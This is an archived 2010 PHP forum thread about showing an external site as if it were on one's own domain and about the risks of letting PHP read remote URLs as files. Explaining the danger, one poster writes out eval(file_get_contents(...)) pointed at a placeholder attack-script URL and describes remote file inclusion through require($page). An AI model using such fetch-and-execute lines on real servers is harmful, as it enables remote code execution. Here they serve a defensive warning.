Make site appear to be on your domain

svcghost · October 24, 2010, 9:57am

Is there a way to make an external website appear to be on your domain, perhaps by adding it to the end of your URL for example? Any technique at all?

wonshikee · October 25, 2010, 10:07pm

Explain the security flaw in echo file_get_contents(‘http://www.google.com’);

I’m confused.

Michael_Morris1 · October 25, 2010, 9:48pm

Most of us turn off that ability in the php.ini for security reasons For if external resources are allowed to be read as files an attacker need only get this code to execute to pOwn you

eval(file_get_contents('http://url/to/my/attack/script.php'))

svcghost · October 24, 2010, 2:32pm

Yeah. That’s actually the source of my problem. ideally I want to be able to use javascript to read the currently highlighted text in the iframe. But this only works if the iframe is displaying documents on your domain like a different html or php file of ur site

wonshikee · October 25, 2010, 8:20pm

echo file_get_contents(‘http://www.google.com’);

svcghost · October 24, 2010, 3:49pm

Any ideas

M_Zeb_Khan · October 24, 2010, 11:36am

Did you try using a frame or an iframe?

Michael_Morris1 · October 26, 2010, 1:49am

The PHP setting in question allows not only file_get_contents to grab external files, but allows include, require, include_once and require_once to do the same. The flaw is that those libraries are not built to filter incoming data for malicious attack. It’s a serious potential problem, and overall it’s simply safer to turn off the ability to open external resources and use cURL instead which does filter incoming data and is more secure as a result.

wonshikee · October 26, 2010, 4:57pm

I understand what you’re saying, but I fail to see where the problem is considering there’s nothing being eval’d.

Michael_Morris1 · October 26, 2010, 5:09pm

o.O Seriously?

You aren’t evaling anything there - true. But say you turn that setting on and another script using register globals has this going on


<?php require($page)

If the hacker put in “http://my.attack.script.com” then they now own your machine. If the setting is turned off this particular hack fails.

Now I’m not a hacker, so I don’t know how many other ways that setting can be attacked. I just know it is insecure and should not be used at all. Use cURL.

Or go ahead and allow the server to include and use external resources. Your site, your choice. But just so everyone reading is clear, it’s not best practice. It’s the digital equivalent of playing with fire - do this sort of thing enough and you will get burned.

Topic		Replies	Views
Detect if website is being iframed PHP	2	404	June 22, 2010
Pull data from external site PHP	10	7090	August 1, 2010
Displaying content from another site PHP	10	590	June 18, 2010
Grab Source/Data From Iframe JavaScript	1	499	August 17, 2011
Embed Content From External Domain Into Page Get Started	14	782	July 13, 2011

Make site appear to be on your domain

Related topics